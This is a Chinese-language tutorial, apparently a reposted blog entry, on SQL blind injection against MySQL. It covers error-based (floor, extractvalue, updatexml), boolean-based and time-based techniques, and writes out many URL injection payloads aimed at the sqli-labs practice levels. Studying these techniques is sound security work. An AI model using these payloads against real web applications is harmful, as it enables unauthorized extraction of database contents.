sql盲注
作者:互联网
报错注入:适用于数据库报错会将报错信息带到页面
数据库名为test
①、floor报错注入
floor():向下取整,比如0.6返回0,1.1返回1
Rand():返回0到1的随机数
floor( RAND()*2):返回0或1
select count(*),CONCAT(database(),floor( RAND()*2))a FROM student GROUP BY a
需要count,floor( RAND()*2),和group by结合才会报错,用concat将数据带出
报错如下:Duplicate entry 'test0' for key '<group_key>'
报错原理:group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,
又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句执行后的结果。
限制:在mysql数据库高版本中floor报错不会将敏感信息带出
参考链接:https://blog.csdn.net/m0_60339103/article/details/125890455
②、extractvalue报错注入
extractvalue(目标xml文档,xml路径) :对XML文档进行查询的函数
select*FROM student WHERE id=1 AND extractvalue("anything",concat("~",database()))
报错如下:XPATH syntax error: '~test'
原理:通过在函数中写入不符合语法格式的xml路径达到报错的目的(比如写入~)
③、updatexml报错注入
UpdateXML(xml_target, xpath_expr, new_xml):更新选定XML片段的内容
xml - taeget:是我们需要操作的xml片段;
xpath -expr:和上面的一样,是需要更新的路径;
xml -xml:是更新后的的xml字段;
select*FROM student WHERE id=1 AND updatexml("anything",concat("~",database()),"anything")
报错如下:XPATH syntax error: '~test'
原理:通过在函数中写入不符合语法格式的xml路径达到报错的目的
布尔注入(适用于数据库能查询到数据和查询不到数据页面返回不同,但是数据不会显示在页面)
步骤:猜敏感数据长度,通过substr,regexp逐个逐个字符猜测,如果有多条记录,可以通过limit逐次返回一条记录
靶场:sql-lab第八关
left(str,len):从左往右截取指定长度的字符串,str为接收的字符串,len为截取的长度
示例:left('Hello World',3)结果为'Hel'
substr(str,pos,len):从起始位置截取指定长度的字符串,str为接收的字符串,pos为起始位置,len为长度。
示例:substr('Hello World',2, 3)结果为'ell'
regexp正则表达式
like模糊匹配
STRCMP(Str1,Str2)
如果
Str1=Str2:0
Str1<Str2:-1
Str1>Str2:1
ascii(str):
返回字符串中第一位的ascii值,str为接收的字符串。
示例:ascii('hello')结果为104,因为h的ascii值为104。
length(str)
ord(str)函数与其类似
?id=1' and length(database())=8 --+ 猜测数据库长度
使用like结合substr逐个判断字符
?id=1' and substr(database(),1,1) like 's' --+
使用等于结合substr来逐个判断字符
?id=1' and ord(substr(database(),1,1))=115 --+猜当前数据库第一个字段是不是's'
使用正则(regexp )结合substr逐个判断字符
?id=1' and substr(database(),1,1) regexp 's' --+
使用strcmp结合substr逐个判断字符
strcmp等于的时候为false,不等于的时候为true
?id=1' and strcmp(ord(substr(database(),1,1)),115) --+
使用使用limit和正则表达式猜测数据库第一张表是否以u开头
?id=1' and 1=(select 1 from information_schema.TABLES where table_schema="security" and table_name regexp "^u" limit 0,1) --+
left的使用
?id=1' and left(database(),8)="security" --+猜测数据库从左往右8截取的字符串是否为security
时间延迟注入(适用于页面不会显示数据,数据库报错也不会将报错信息显示到页面,查询的到数据和查询不到数据页面返回相同,但是可以通过函数将sql查询时间变长,页面响应变慢)
步骤:与布尔盲注类似,同样是猜敏感数据长度,通过substr,regexp逐个逐个字符猜测,如果有多条记录,可以通过limit逐次返回一条记录,但是由于页面没有变化,所以如果猜测结果可以用是否延迟来判断
利用函数:sleep()和benchmark(count,expr)。
BENCHMARK()函数是用来判断某个操作的运行性能,返回值一直是0。
expr是操作语句,count是操作次数。
靶场:sql-lab第九关
?id=1' and if(ord(substr(database(),1,1))=115,sleep(5),1) --+
case when替换if
?id=1' union select 1,2, case when ord(substr(database(),1,1))=115 then sleep(5) else 0 end--+
或
?id=1' and case when ord(substr(database(),1,1))=115 then sleep(5) else 0 end--+
and或or替换if
?id=1' and ord(substr(database(),1,1))=115 and sleep(5) --+
参考链接:https://www.modb.pro/db/104064
标签:xml,database,substr,报错,--+,sql,盲注,id 来源: https://www.cnblogs.com/lzstar/p/16580140.html